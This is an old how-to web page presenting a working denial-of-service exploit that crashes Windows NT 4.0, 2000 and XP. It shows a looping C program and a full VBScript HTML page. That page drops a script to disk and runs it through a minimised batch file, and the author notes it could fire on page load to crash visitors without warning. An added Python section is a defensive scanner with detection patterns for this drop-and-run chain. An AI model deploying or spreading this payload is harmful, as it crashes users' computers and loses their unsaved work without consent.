HOW TO crash Windows NT 4.0\2000\XP using only VBScript

Update 16/2/2003. It has come to my attention that this bug has been fixed in Windows NT 4.0 SP6.0a, Windows 2000 SP3 and Windows XP SP1. This script will also only work as a local script, and not in the VB Script runtime internet zone sand-box.

Background

The March 2002 issue of the computing journal Windows::Developer (page 44) published a small C program that can cause Microsoft Windows NT 4.0 and 2000 to crash. The Windows term for this type of crash is a "blue screen", because the Windows user interface disappears and a blue screen is displayed with diagnostic information in white text. When this happens, the operating system must be rebooted. This type of crash is normally caused by a device driver raising a STOP error, yet this program is extremely simple.

The original program

The article says that this program was originally posted by Masaru Tsuchiyama on the comp.os.ms-windows.programmer.win32 newsgroup.


#include <stdio.h>
void main()
{
	for(;;)
	{
		printf("Hung up\t\b\b\b\b\b\b");
	}
}

On analysis, the program runs in an infinite loop, continually printing the string "Hung up". The tab character moves the cursor 4 characters along in the DOS prompt, then the backspaces move the cursor 6 characters back. In practice, the leading part of the string can be any valid string.

After 2 iterations the cursor is behind the start position; in reality the pointer in the command prompt must be pointing at random memory. As the program loops again and again it gets further down in memory, eventually causing a protection fault in a Windows subsystem.

I would expect this code to only cause a protection fault in the application and it shouldn't crash the operating system. Perhaps Microsoft can shed light on this problem? This program does not cause a similar problem on Windows 95\98 or ME.

The script risk

When we saw this, someone commented on the potential danger of this being executed in a script, particularly on a web page. We thought it was impossible; it's a pity that it wasn't.

VBScript in a web page

I believed that this program could be reproduced purely in script. An executable console application generated by a C Compiler is one thing, but a script is more dangerous because it could be used on a web page.

If you wish to test this script, download here.
Important! Close all of your applications and save your work before you test this.

For additional safety the script will only run when the button is pressed, but it could be called in the Window_onLoad handler, crashing the machine without warning.


<html>
<head>
</head>

<body>
<input type="BUTTON" name="Write" value="Click me" language=VBS onclick="WriteToFile">

<script language="vbs">
Sub WriteToFile
	Dim fso, f
	Set fso = CreateObject("Scripting.FileSystemObject")
	Set f = fso.OpenTextFile("c:\hangup.vbs", 2, True)
	f.Write "While 1"
	f.WriteBlankLines 1
	f.Write "  WScript.StdOut.Write ""a""+chr(9)+chr(8)+chr(8)+chr(8)+chr(8)+chr(8)+chr(8)"
	f.WriteBlankLines 1
	f.Write "Wend"
	f.Close

	Set f = fso.OpenTextFile("c:\hangup.bat", 2, True)
	f.Write "cscript c:\hangup.vbs"
	f.Close

	Dim w
	Set w = CreateObject("WScript.Shell")
	w.Run "c:\hangup.bat",2
End Sub
</script>

</body>
</html>

The page uses VBScript to write a VBScript file that is then executed by the CScript.exe scripting host. CScript.exe is used, as opposed to WScript.exe, because it allows text output to the console.

Note that WScript.StdOut.Write is used. The problem does not occur when WScript.Write is used. Also note that the batch file is run minimized by passing 2 as the second parameter to the Run method. This hides the console from the user so they may not see what's happening until it's too late.
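As an added example (not code from the original page), a small static check that flags the pattern just described in saved HTML: a VBScript block that creates Scripting.FileSystemObject and WScript.Shell, writes a script file and launches it with window style 2, or fires from an onload handler. The signature names and the two sample pages are constructed here; the ProgIDs and methods are the real ones the page's script uses.

```python
"""Static check for the drop-and-run pattern described on this page.
Added example, not code from the original page; sample HTML is constructed."""
import re

# Signature names are our own labels; ProgIDs/methods are the real ones
# used by the page's script.
SIGNATURES = {
    "fso_create": re.compile(r'CreateObject\(\s*"Scripting\.FileSystemObject"\s*\)', re.I),
    "shell_create": re.compile(r'CreateObject\(\s*"WScript\.Shell"\s*\)', re.I),
    "writes_script": re.compile(r'OpenTextFile\(\s*"[^"]+\.(?:vbs|bat|cmd|js)"', re.I),
    "run_minimised": re.compile(r'\.Run\s+[^,\n]+,\s*2\b', re.I),  # window style 2
}
SCRIPT_RE = re.compile(r'<script\b([^>]*)>(.*?)</script>', re.I | re.S)
VBS_LANG_RE = re.compile(r'language\s*=\s*"?(?:vbs|vbscript)\b', re.I)
ONLOAD_RE = re.compile(r'Window_onLoad|\bonload\s*=', re.I)

def scan_html(html):
    """Return sorted signature names triggered by VBScript blocks in the page."""
    hits = set()
    for attrs, body in SCRIPT_RE.findall(html):
        if not VBS_LANG_RE.search(attrs):
            continue            # only VBScript blocks are in scope here
        hits.update(name for name, rx in SIGNATURES.items() if rx.search(body))
    if ONLOAD_RE.search(html):  # runs without a click, as the page warns
        hits.add("autorun_onload")
    return sorted(hits)

def verdict(hits):
    """Write-to-disk plus shell launch is the page's chain; rate it highest."""
    if {"fso_create", "writes_script", "shell_create"} <= set(hits):
        return "high"
    if "fso_create" in hits or "shell_create" in hits:
        return "medium"
    return "low"

# Constructed sample modelled on the page's listing, payload line omitted.
SAMPLE_PAGE = """<html><body onload="WriteToFile">
<script language="vbs">
Sub WriteToFile
  Set fso = CreateObject("Scripting.FileSystemObject")
  Set f = fso.OpenTextFile("c:\\hangup.vbs", 2, True)
  f.Write "' payload omitted in this sample"
  f.Close
  Set w = CreateObject("WScript.Shell")
  w.Run "c:\\hangup.bat",2
End Sub
</script></body></html>"""
BENIGN_PAGE = '<script language="vbscript">MsgBox "hello"</script>'

if __name__ == "__main__":
    for page in (SAMPLE_PAGE, BENIGN_PAGE):
        print(verdict(scan_html(page)), scan_html(page))
```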

Analysis

This script was written by me to illustrate the problem, using the Windows Scripting Host shell to execute the script and FileSystemObject to write the dangerous script payload from the page.

This could be executed on a web page; it may even be possible to cause it to be executed on a web server, although I cannot think of a way to do this yet. XML and SOAP servers that load script into a DOM Document may be susceptible to this. The potential for mischief is enormous!

The bottom line is, if it runs Windows NT 4.0\2000 or XP and it executes this script, it will crash.

The crash screen

Here is a transcript of the crash report on Windows NT 4.0 with Service Pack 6 installed.


STOP: c000021a (Fatal System Error)
The Windows SubSystem system process terminated unexpectedly
with a status of 0xc0000005 (0x77f7d670 0x00a3fa30).
The system has been shut down.

Restart and set the recovery options in the system control panel
or the /CRASHDEBUG system start option. If this message reappears,
contact your system administration or technical support group.

On Windows 2000 with Service Pack 2 installed it caused a blue screen too.
On Windows XP the operating system rebooted but did not blue screen.
